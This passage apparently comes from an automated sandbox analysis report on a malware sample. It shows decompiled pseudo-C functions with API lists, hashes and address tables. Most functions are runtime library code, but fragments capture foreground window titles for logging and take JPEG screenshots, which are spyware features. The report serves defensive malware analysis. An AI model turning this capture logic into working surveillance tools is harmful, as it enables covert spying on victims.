                                                                                                  • Part of subcall function 004184AF: GetWindowTextLengthW.USER32(00000000), ref: 004184C8
                                                                                                  • Part of subcall function 004184AF: GetWindowTextW.USER32 ref: 004184F2
                                                                                                • Sleep.KERNEL32(000001F4), ref: 00408AE5
                                                                                                • Sleep.KERNEL32(00000064), ref: 00408B7F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$ForegroundLength
                                                                                                • String ID: [ $ ]$hpg
                                                                                                • API String ID: 3309952895-2979498528
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 82%
                                                                                                			E00442FEC(void* __ecx) {
                                                                                                				void* __esi;
                                                                                                				intOrPtr _t2;
                                                                                                				void* _t4;
                                                                                                				void* _t10;
                                                                                                				void* _t11;
                                                                                                				void* _t13;
                                                                                                				void* _t15;
                                                                                                				long _t16;
                                                                                                
                                                                                                				_t11 = __ecx;
                                                                                                				_t16 = GetLastError();
                                                                                                				_t10 = 0;
                                                                                                				_t2 =  *0x46c1d0; // 0x6
                                                                                                				_t19 = _t2 - 0xffffffff;
                                                                                                				if(_t2 == 0xffffffff) {
                                                                                                					L2:
                                                                                                					_t15 = E00440628(_t11, 1, 0x364);
                                                                                                					_pop(_t13);
                                                                                                					if(_t15 != 0) {
                                                                                                						_t4 = E00443565(_t13, _t16, __eflags,  *0x46c1d0, _t15);
                                                                                                						__eflags = _t4;
                                                                                                						if(_t4 != 0) {
                                                                                                							E00442DDA(_t13, _t15, 0x46d654);
                                                                                                							E004414D5(_t10);
                                                                                                							__eflags = _t15;
                                                                                                							if(_t15 != 0) {
                                                                                                								goto L9;
                                                                                                							} else {
                                                                                                								goto L8;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_push(_t15);
                                                                                                							goto L4;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_push(_t10);
                                                                                                						L4:
                                                                                                						E004414D5();
                                                                                                						L8:
                                                                                                						SetLastError(_t16);
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t15 = E0044350F(_t11, _t16, _t19, _t2);
                                                                                                					if(_t15 != 0) {
                                                                                                						L9:
                                                                                                						SetLastError(_t16);
                                                                                                						_t10 = _t15;
                                                                                                					} else {
                                                                                                						goto L2;
                                                                                                					}
                                                                                                				}
                                                                                                				return _t10;
                                                                                                			}

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,?,00438937,00440CAF,?,?,0042FF99,?,?,00401696,?,?,?,?,?), ref: 00442FF1
                                                                                                • _free.LIBCMT ref: 00443026
                                                                                                • _free.LIBCMT ref: 0044304D
                                                                                                • SetLastError.KERNEL32(00000000), ref: 0044305A
                                                                                                • SetLastError.KERNEL32(00000000), ref: 00443063
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$_free
                                                                                                • String ID:
                                                                                                • API String ID: 3170660625-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00449E8C(intOrPtr* _a4) {
                                                                                                				intOrPtr _t6;
                                                                                                				intOrPtr* _t21;
                                                                                                				void* _t23;
                                                                                                				void* _t24;
                                                                                                				void* _t25;
                                                                                                				void* _t26;
                                                                                                				void* _t27;
                                                                                                
                                                                                                				_t21 = _a4;
                                                                                                				if(_t21 != 0) {
                                                                                                					_t23 =  *_t21 -  *0x46c178; // 0x46c170
                                                                                                					if(_t23 != 0) {
                                                                                                						E004414D5(_t7);
                                                                                                					}
                                                                                                					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x46c17c; // 0x46d64c
                                                                                                					if(_t24 != 0) {
                                                                                                						E004414D5(_t8);
                                                                                                					}
                                                                                                					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x46c180; // 0x46d64c
                                                                                                					if(_t25 != 0) {
                                                                                                						E004414D5(_t9);
                                                                                                					}
                                                                                                					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x46c1a8; // 0x46c174
                                                                                                					if(_t26 != 0) {
                                                                                                						E004414D5(_t10);
                                                                                                					}
                                                                                                					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                                                                                                					_t27 = _t6 -  *0x46c1ac; // 0x46d650
                                                                                                					if(_t27 != 0) {
                                                                                                						return E004414D5(_t6);
                                                                                                					}
                                                                                                				}
                                                                                                				return _t6;
                                                                                                			}











                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00449EA4
                                                                                                  • Part of subcall function 004414D5: HeapFree.KERNEL32(00000000,00000000,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?), ref: 004414EB
                                                                                                  • Part of subcall function 004414D5: GetLastError.KERNEL32(?,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?,?), ref: 004414FD
                                                                                                • _free.LIBCMT ref: 00449EB6
                                                                                                • _free.LIBCMT ref: 00449EC8
                                                                                                • _free.LIBCMT ref: 00449EDA
                                                                                                • _free.LIBCMT ref: 00449EEC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 6c1f8a6fe69ad3b210c010f5ddf1bd246f5b6ba47237bec097538ba66248a7b4
                                                                                                • Instruction ID: 36bd744c82bd203efc321f79432b982e7347cafb28f25619c4515b635df10c4e
                                                                                                • Opcode Fuzzy Hash: 6c1f8a6fe69ad3b210c010f5ddf1bd246f5b6ba47237bec097538ba66248a7b4
                                                                                                • Instruction Fuzzy Hash: DCF018325042107BFA10EF6AE4C5C6773F9AA41720764481BF044D7A52DB78FCC09A6C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 91%
                                                                                                			E0043EB7D(signed int __ecx) {
                                                                                                				intOrPtr _t7;
                                                                                                
                                                                                                				asm("lock xadd [eax], ecx");
                                                                                                				if((__ecx | 0xffffffff) == 0) {
                                                                                                					_t7 =  *0x46c990; // 0x66fc18
                                                                                                					if(_t7 != 0x46c770) {
                                                                                                						E004414D5(_t7);
                                                                                                						 *0x46c990 = 0x46c770;
                                                                                                					}
                                                                                                				}
                                                                                                				E004414D5( *0x46da04);
                                                                                                				 *0x46da04 = 0;
                                                                                                				E004414D5( *0x46da08);
                                                                                                				 *0x46da08 = 0;
                                                                                                				E004414D5( *0x46da34);
                                                                                                				 *0x46da34 = 0;
                                                                                                				E004414D5( *0x46da38);
                                                                                                				 *0x46da38 = 0;
                                                                                                				return 1;
                                                                                                			}





                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 0043EB9B
                                                                                                  • Part of subcall function 004414D5: HeapFree.KERNEL32(00000000,00000000,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?), ref: 004414EB
                                                                                                  • Part of subcall function 004414D5: GetLastError.KERNEL32(?,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?,?), ref: 004414FD
                                                                                                • _free.LIBCMT ref: 0043EBAD
                                                                                                • _free.LIBCMT ref: 0043EBC0
                                                                                                • _free.LIBCMT ref: 0043EBD1
                                                                                                • _free.LIBCMT ref: 0043EBE2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 8476dbb9e971029f38abb61a69617b74b9a94394b61fba38927499bfc5fc5a79
                                                                                                • Instruction ID: 2504f23887d4ca37e818cc2ef72231bb6271f2d7630936b8e706385f5ec1a0fc
                                                                                                • Opcode Fuzzy Hash: 8476dbb9e971029f38abb61a69617b74b9a94394b61fba38927499bfc5fc5a79
                                                                                                • Instruction Fuzzy Hash: ACF0D0B0D0E1609B9B02AF66AC814153771B708738705512BF45596A71FBB904819F8E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 97%
                                                                                                			E00437148(char _a4, char _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20) {
                                                                                                				signed char _v5;
                                                                                                				signed int _v12;
                                                                                                				signed char _v16;
                                                                                                				signed int _v20;
                                                                                                				signed int _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				signed int _v32;
                                                                                                				signed char _v36;
                                                                                                				signed int _v40;
                                                                                                				signed int _v44;
                                                                                                				signed int _v48;
                                                                                                				intOrPtr* _v52;
                                                                                                				char _v56;
                                                                                                				char _v64;
                                                                                                				char _v68;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				intOrPtr* _t85;
                                                                                                				signed int _t87;
                                                                                                				void* _t90;
                                                                                                				signed int _t94;
                                                                                                				signed int _t95;
                                                                                                				signed int _t101;
                                                                                                				signed int _t102;
                                                                                                				signed int _t103;
                                                                                                				signed char _t104;
                                                                                                				signed int _t105;
                                                                                                				intOrPtr _t106;
                                                                                                				signed char _t114;
                                                                                                				signed int _t115;
                                                                                                				signed int _t118;
                                                                                                				signed int _t119;
                                                                                                				signed int _t121;
                                                                                                				void* _t122;
                                                                                                				void* _t131;
                                                                                                				signed char _t132;
                                                                                                				signed int _t138;
                                                                                                				signed int _t139;
                                                                                                				signed char _t140;
                                                                                                				signed int _t143;
                                                                                                				void* _t146;
                                                                                                				signed int _t148;
                                                                                                				void* _t152;
                                                                                                				signed int _t153;
                                                                                                				void* _t154;
                                                                                                				intOrPtr* _t155;
                                                                                                				intOrPtr* _t156;
                                                                                                				signed int _t157;
                                                                                                				void* _t158;
                                                                                                
                                                                                                				if(E00437442( &_a8) == 0) {
                                                                                                					L5:
                                                                                                					_t153 = 0;
                                                                                                					_t157 = 0;
                                                                                                					L6:
                                                                                                					_t85 = _a12;
                                                                                                					if(_t85 != 0) {
                                                                                                						 *_t85 = _a8;
                                                                                                					}
                                                                                                					return _t153;
                                                                                                				}
                                                                                                				_t87 = _a16;
                                                                                                				if(_t87 == 0 || _t87 >= 2 && _t87 <= 0x24) {
                                                                                                					_push(_t131);
                                                                                                					_t5 =  &_a4; // 0x437b35
                                                                                                					E00436267(_t131,  &_v68, _t146,  *_t5);
                                                                                                					_v20 = 0;
                                                                                                					_t157 = 0;
                                                                                                					_t90 = _a8;
                                                                                                					_v52 = _t90;
                                                                                                					L11:
                                                                                                					_t132 =  *_t90;
                                                                                                					_a8 = _t90 + 1;
                                                                                                					_v16 = _t132;
                                                                                                					_v5 = _t132;
                                                                                                					_t94 = E00437487(_t132, _t146, _t152, _t157, _t132 & 0x000000ff, 8,  &_v64);
                                                                                                					_t158 = _t158 + 0xc;
                                                                                                					__eflags = _t94;
                                                                                                					if(_t94 != 0) {
                                                                                                						_t90 = _a8;
                                                                                                						goto L11;
                                                                                                					}
                                                                                                					__eflags = _a20 - _t94;
                                                                                                					_t95 = _t94 & 0xffffff00 | _a20 != _t94;
                                                                                                					_v12 = _t95;
                                                                                                					__eflags = _t132 - 0x2d;
                                                                                                					if(_t132 != 0x2d) {
                                                                                                						__eflags = _t132 - 0x2b;
                                                                                                						if(_t132 != 0x2b) {
                                                                                                							_t154 = _a8;
                                                                                                							goto L17;
                                                                                                						}
                                                                                                						goto L15;
                                                                                                					} else {
                                                                                                						_v12 = _t95 | 0x00000002;
                                                                                                						L15:
                                                                                                						_t156 = _a8;
                                                                                                						_t132 =  *_t156;
                                                                                                						_t154 = _t156 + 1;
                                                                                                						_v5 = _t132;
                                                                                                						_v16 = _t132;
                                                                                                						_a8 = _t154;
                                                                                                						L17:
                                                                                                						_t138 = _a16;
                                                                                                						_t148 = 0x10;
                                                                                                						__eflags = _t138;
                                                                                                						if(_t138 == 0) {
                                                                                                							L19:
                                                                                                							__eflags = _t132 - 0x30 - 9;
                                                                                                							if(_t132 - 0x30 > 9) {
                                                                                                								__eflags = _t132 - 0x61 - 0x19;
                                                                                                								if(_t132 - 0x61 > 0x19) {
                                                                                                									_t101 = _t132 - 0x41;
                                                                                                									__eflags = _t101 - 0x19;
                                                                                                									if(_t101 > 0x19) {
                                                                                                										_t102 = _t101 | 0xffffffff;
                                                                                                										__eflags = _t102;
                                                                                                									} else {
                                                                                                										_t102 = _t132 + 0xffffffc9;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t102 = _t132 + 0xffffffa9;
                                                                                                								}
                                                                                                							} else {
                                                                                                								_t102 = _t132 + 0xffffffd0;
                                                                                                							}
                                                                                                							__eflags = _t102;
                                                                                                							if(_t102 == 0) {
                                                                                                								_t103 =  *_t154;
                                                                                                								_t155 = _t154 + 1;
                                                                                                								_v32 = _t103;
                                                                                                								_a8 = _t155;
                                                                                                								__eflags = _t103 - 0x78;
                                                                                                								if(_t103 == 0x78) {
                                                                                                									L35:
                                                                                                									__eflags = _t138;
                                                                                                									if(_t138 == 0) {
                                                                                                										_a16 = _t148;
                                                                                                									}
                                                                                                									_t104 =  *_t155;
                                                                                                									_t154 = _t155 + 1;
                                                                                                									_v5 = _t104;
                                                                                                									_v16 = _t104;
                                                                                                									_a8 = _t154;
                                                                                                									L34:
                                                                                                									_t105 = _a16;
                                                                                                									goto L39;
                                                                                                								}
                                                                                                								__eflags = _t103 - 0x58;
                                                                                                								if(_t103 == 0x58) {
                                                                                                									goto L35;
                                                                                                								}
                                                                                                								__eflags = _t138;
                                                                                                								if(_t138 == 0) {
                                                                                                									_a16 = 8;
                                                                                                								}
                                                                                                								E004373EE( &_a8, _v32);
                                                                                                								_t154 = _a8;
                                                                                                								goto L34;
                                                                                                							} else {
                                                                                                								__eflags = _t138;
                                                                                                								if(_t138 != 0) {
                                                                                                									L38:
                                                                                                									_t105 = _t138;
                                                                                                									L39:
                                                                                                									asm("cdq");
                                                                                                									_t139 = _t148;
                                                                                                									_v48 = _t105;
                                                                                                									_v44 = _t139;
                                                                                                									_t106 = E00451BE0(0xffffffff, 0xffffffff, _t105, _t139);
                                                                                                									_v40 = _t139;
                                                                                                									_t140 = _v5;
                                                                                                									_v36 = _t132;
                                                                                                									__eflags = 0;
                                                                                                									_v28 = _t106;
                                                                                                									_v32 = _t148;
                                                                                                									while(1) {
                                                                                                										__eflags = _t140 - 0x30 - 9;
                                                                                                										if(_t140 - 0x30 > 9) {
                                                                                                											__eflags = _t140 - 0x61 - 0x19;
                                                                                                											if(_t140 - 0x61 > 0x19) {
                                                                                                												__eflags = _t140 - 0x41 - 0x19;
                                                                                                												if(_t140 - 0x41 > 0x19) {
                                                                                                													_t148 = _t148 | 0xffffffff;
                                                                                                													__eflags = _t148;
                                                                                                												} else {
                                                                                                													_t148 = _t140 + 0xffffffc9;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t148 = _t140 + 0xffffffa9;
                                                                                                											}
                                                                                                										} else {
                                                                                                											_t148 = _t140 + 0xffffffd0;
                                                                                                										}
                                                                                                										_v24 = _t148;
                                                                                                										__eflags = _t148 - 0xffffffff;
                                                                                                										if(_t148 == 0xffffffff) {
                                                                                                											break;
                                                                                                										}
                                                                                                										__eflags = _t148 - _a16;
                                                                                                										if(_t148 >= _a16) {
                                                                                                											break;
                                                                                                										}
                                                                                                										_t121 = _v20;
                                                                                                										_t143 = _v12 | 0x00000008;
                                                                                                										_v12 = _t143;
                                                                                                										__eflags = _t157 - _v32;
                                                                                                										if(__eflags < 0) {
                                                                                                											L58:
                                                                                                											_t122 = E004519E0(_v48, _v44, _t121, _t157);
                                                                                                											_t157 = _t148;
                                                                                                											_v20 = _t122 + _v24;
                                                                                                											asm("adc esi, ebx");
                                                                                                											L59:
                                                                                                											_t140 =  *_t154;
                                                                                                											_t154 = _t154 + 1;
                                                                                                											_v16 = _t140;
                                                                                                											_a8 = _t154;
                                                                                                											continue;
                                                                                                										}
                                                                                                										if(__eflags > 0) {
                                                                                                											L52:
                                                                                                											__eflags = _t121 - _v28;
                                                                                                											if(_t121 != _v28) {
                                                                                                												L57:
                                                                                                												_v12 = _t143 | 0x00000004;
                                                                                                												goto L59;
                                                                                                											}
                                                                                                											__eflags = _t157 - _v32;
                                                                                                											if(_t157 != _v32) {
                                                                                                												goto L57;
                                                                                                											}
                                                                                                											__eflags = 0 - _v36;
                                                                                                											if(__eflags < 0) {
                                                                                                												goto L58;
                                                                                                											}
                                                                                                											if(__eflags > 0) {
                                                                                                												goto L57;
                                                                                                											}
                                                                                                											__eflags = _t148 - _v40;
                                                                                                											if(_t148 <= _v40) {
                                                                                                												goto L58;
                                                                                                											}
                                                                                                											goto L57;
                                                                                                										}
                                                                                                										__eflags = _t121 - _v28;
                                                                                                										if(_t121 < _v28) {
                                                                                                											goto L58;
                                                                                                										}
                                                                                                										goto L52;
                                                                                                									}
                                                                                                									E004373EE( &_a8, _v16);
                                                                                                									_t114 = _v12;
                                                                                                									__eflags = _t114 & 0x00000008;
                                                                                                									if((_t114 & 0x00000008) != 0) {
                                                                                                										_t153 = _v20;
                                                                                                										_t115 = E004367DD(_t114, _t153, _t157);
                                                                                                										__eflags = _t115;
                                                                                                										if(_t115 == 0) {
                                                                                                											__eflags = _v12 & 0x00000002;
                                                                                                											if((_v12 & 0x00000002) != 0) {
                                                                                                												_t153 =  ~_t153;
                                                                                                												asm("adc esi, ebx");
                                                                                                												_t157 =  ~_t157;
                                                                                                											}
                                                                                                											L71:
                                                                                                											__eflags = _v56;
                                                                                                											if(_v56 != 0) {
                                                                                                												 *(_v68 + 0x350) =  *(_v68 + 0x350) & 0xfffffffd;
                                                                                                											}
                                                                                                											goto L6;
                                                                                                										}
                                                                                                										 *((intOrPtr*)(E00438932())) = 0x22;
                                                                                                										_t118 = _v12;
                                                                                                										__eflags = _t118 & 0x00000001;
                                                                                                										if((_t118 & 0x00000001) != 0) {
                                                                                                											__eflags = _t118 & 0x00000002;
                                                                                                											if((_t118 & 0x00000002) == 0) {
                                                                                                												_t119 = _t118 | 0xffffffff;
                                                                                                												__eflags = _t119;
                                                                                                												_t157 = 0x7fffffff;
                                                                                                											} else {
                                                                                                												_t119 = 0;
                                                                                                												_t157 = 0x80000000;
                                                                                                											}
                                                                                                											L68:
                                                                                                											_t153 = _t119;
                                                                                                											goto L71;
                                                                                                										}
                                                                                                										_t153 = _t153 | 0xffffffff;
                                                                                                										_t157 = _t157 | 0xffffffff;
                                                                                                										goto L71;
                                                                                                									}
                                                                                                									_a8 = _v52;
                                                                                                									_t119 = 0;
                                                                                                									_t157 = 0;
                                                                                                									goto L68;
                                                                                                								}
                                                                                                								_t105 = 0xa;
                                                                                                								_a16 = _t105;
                                                                                                								goto L39;
                                                                                                							}
                                                                                                						}
                                                                                                						__eflags = _t138 - _t148;
                                                                                                						if(_t138 != _t148) {
                                                                                                							goto L38;
                                                                                                						}
                                                                                                						goto L19;
                                                                                                					}
                                                                                                				} else {
                                                                                                					 *((intOrPtr*)(E00438932())) = 0x16;
                                                                                                					E00437709();
                                                                                                					goto L5;
                                                                                                				}
                                                                                                			}

                                                                                                0x00437255
                                                                                                0x004372a3
                                                                                                0x004372a3
                                                                                                0x004372a5
                                                                                                0x004372a5
                                                                                                0x004372a6
                                                                                                0x004372a8
                                                                                                0x004372b1
                                                                                                0x004372b4
                                                                                                0x004372b9
                                                                                                0x004372bc
                                                                                                0x004372bf
                                                                                                0x004372c2
                                                                                                0x004372c4
                                                                                                0x004372c7
                                                                                                0x004372ca
                                                                                                0x004372ce
                                                                                                0x004372d0
                                                                                                0x004372de
                                                                                                0x004372e0
                                                                                                0x004372ee
                                                                                                0x004372f0
                                                                                                0x004372fa
                                                                                                0x004372fa
                                                                                                0x004372f2
                                                                                                0x004372f5
                                                                                                0x004372f5
                                                                                                0x004372e2
                                                                                                0x004372e5
                                                                                                0x004372e5
                                                                                                0x004372d2
                                                                                                0x004372d5
                                                                                                0x004372d5
                                                                                                0x004372fd
                                                                                                0x00437300
                                                                                                0x00437303
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00437305
                                                                                                0x00437308
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043730d
                                                                                                0x00437310
                                                                                                0x00437313
                                                                                                0x00437316
                                                                                                0x00437319
                                                                                                0x00437340
                                                                                                0x00437348
                                                                                                0x00437350
                                                                                                0x00437352
                                                                                                0x00437355
                                                                                                0x00437357
                                                                                                0x00437357
                                                                                                0x00437359
                                                                                                0x0043735a
                                                                                                0x0043735d
                                                                                                0x00000000
                                                                                                0x0043735d
                                                                                                0x0043731b
                                                                                                0x00437322
                                                                                                0x00437322
                                                                                                0x00437325
                                                                                                0x00437338
                                                                                                0x0043733b
                                                                                                0x00000000
                                                                                                0x0043733b
                                                                                                0x00437327
                                                                                                0x0043732a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043732c
                                                                                                0x0043732f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00437331
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00437333
                                                                                                0x00437336
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00437336
                                                                                                0x0043731d
                                                                                                0x00437320
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00437320
                                                                                                0x0043736b
                                                                                                0x00437370
                                                                                                0x00437373
                                                                                                0x00437375
                                                                                                0x00437383
                                                                                                0x00437389
                                                                                                0x00437391
                                                                                                0x00437393
                                                                                                0x004373c8
                                                                                                0x004373cc
                                                                                                0x004373ce
                                                                                                0x004373d0
                                                                                                0x004373d2
                                                                                                0x004373d2
                                                                                                0x004373d4
                                                                                                0x004373d4
                                                                                                0x004373d9
                                                                                                0x004373e2
                                                                                                0x004373e2
                                                                                                0x00000000
                                                                                                0x004373d9
                                                                                                0x0043739a
                                                                                                0x004373a0
                                                                                                0x004373a3
                                                                                                0x004373a5
                                                                                                0x004373af
                                                                                                0x004373b1
                                                                                                0x004373bc
                                                                                                0x004373bc
                                                                                                0x004373bf
                                                                                                0x004373b3
                                                                                                0x004373b3
                                                                                                0x004373b5
                                                                                                0x004373b5
                                                                                                0x004373c4
                                                                                                0x004373c4
                                                                                                0x00000000
                                                                                                0x004373c4
                                                                                                0x004373a7
                                                                                                0x004373aa
                                                                                                0x00000000
                                                                                                0x004373aa
                                                                                                0x0043737a
                                                                                                0x0043737d
                                                                                                0x0043737f
                                                                                                0x00000000
                                                                                                0x0043737f
                                                                                                0x00437259
                                                                                                0x0043725a
                                                                                                0x00000000
                                                                                                0x0043725a
                                                                                                0x00437251
                                                                                                0x00437214
                                                                                                0x00437216
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00437216
                                                                                                0x0043716f
                                                                                                0x00437174
                                                                                                0x0043717a
                                                                                                0x00000000
                                                                                                0x0043717a

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-$5{C
                                                                                                • API String ID: 1302938615-3679760776
                                                                                                • Opcode ID: 52ea4b79f5b1ed9fcbc3d66fe3a7d5c81c938f15fe1c964ea1d8387f698a4ab1
                                                                                                • Instruction ID: 7d73cbb27c0b51a22d9a2667e9ba6cb65d65831ca4aad46e164589b5038037b9
                                                                                                • Opcode Fuzzy Hash: 52ea4b79f5b1ed9fcbc3d66fe3a7d5c81c938f15fe1c964ea1d8387f698a4ab1
                                                                                                • Instruction Fuzzy Hash: FF91BBB19081499EDF34CEA9C4506EF7BB1AF59320F14A29BFCE197381D2389902DB59
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 70%
                                                                                                			E00414F9A(signed int __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                				char _v112;
                                                                                                				intOrPtr _v116;
                                                                                                				intOrPtr _v144;
                                                                                                				char _v184;
                                                                                                				char _v208;
                                                                                                				void* _v212;
                                                                                                				char _v232;
                                                                                                				void* _v236;
                                                                                                				char _v256;
                                                                                                				void* _v260;
                                                                                                				char _v280;
                                                                                                				void* _v284;
                                                                                                				char _v300;
                                                                                                				char _v304;
                                                                                                				char _v308;
                                                                                                				char _v328;
                                                                                                				intOrPtr _v332;
                                                                                                				intOrPtr _v336;
                                                                                                				char _v352;
                                                                                                				intOrPtr _v356;
                                                                                                				char _v364;
                                                                                                				char _v380;
                                                                                                				char _v384;
                                                                                                				char _v392;
                                                                                                				void* _v404;
                                                                                                				signed int _v432;
                                                                                                				char _v448;
                                                                                                				char _v452;
                                                                                                				void* _v476;
                                                                                                				char _v480;
                                                                                                				intOrPtr _v484;
                                                                                                				char _v488;
                                                                                                				char _v492;
                                                                                                				char _v500;
                                                                                                				char _v504;
                                                                                                				char _v516;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				intOrPtr* _t63;
                                                                                                				void* _t98;
                                                                                                				void* _t99;
                                                                                                				void* _t124;
                                                                                                				intOrPtr* _t125;
                                                                                                				char* _t133;
                                                                                                				intOrPtr _t191;
                                                                                                				intOrPtr* _t202;
                                                                                                				signed int _t214;
                                                                                                				void* _t216;
                                                                                                				void* _t217;
                                                                                                
                                                                                                				_t186 = __edx;
                                                                                                				_t216 = (_t214 & 0xfffffff8) - 0x1ac;
                                                                                                				_push(_t124);
                                                                                                				_t207 = _a4;
                                                                                                				 *0x46de68 = _a4;
                                                                                                				_v432 = __ecx & 0x000000ff;
                                                                                                				E004152EA( &_v380, __edx, __eflags, _a4);
                                                                                                				if(E0040247B() != 0) {
                                                                                                					_t133 =  &_v380;
                                                                                                					_t63 =  *0x46dd00(E00401F87(_t133), E0040247B());
                                                                                                					_t125 = _t63;
                                                                                                					E00414E19( &_v364, _t125);
                                                                                                					E00415656(L"image/jpeg",  &_v300);
                                                                                                					_v356 = 1;
                                                                                                					asm("movsd");
                                                                                                					asm("movsd");
                                                                                                					asm("movsd");
                                                                                                					asm("movsd");
                                                                                                					_v336 = 1;
                                                                                                					_v332 = 4;
                                                                                                					_v328 =  &_v448;
                                                                                                					_t202 =  *0x46dd00(0, 0, _t133);
                                                                                                					E00414EB5( &_v308,  &_v380, _t202,  &_v308,  &_v364);
                                                                                                					 *((intOrPtr*)( *_t202 + 0x30))(_t202,  &_v112, 1);
                                                                                                					E004052FD(_t125,  &_v452,  &_v300, _t202, _v116, 0);
                                                                                                					asm("xorps xmm0, xmm0");
                                                                                                					asm("movlpd [esp+0x18], xmm0");
                                                                                                					 *((intOrPtr*)( *_t202 + 0x14))(_t202, _v484, _v480, 0, 0);
                                                                                                					_t210 =  *_t202;
                                                                                                					 *((intOrPtr*)( *_t202 + 0xc))(_t202, E00401F87( &_v480), _v144, 0);
                                                                                                					 *((intOrPtr*)( *_t125 + 8))(_t125);
                                                                                                					 *((intOrPtr*)( *_t202 + 8))(_t202);
                                                                                                					E0043CDA6( &_v504, E0040247B(),  &_v516, 0xa);
                                                                                                					_t217 = _t216 + 0xc;
                                                                                                					__eflags =  *0x46dd5e - 1;
                                                                                                					if( *0x46dd5e != 1) {
                                                                                                						__eflags =  *0x46e9ac - 0xffffffff;
                                                                                                						if(__eflags != 0) {
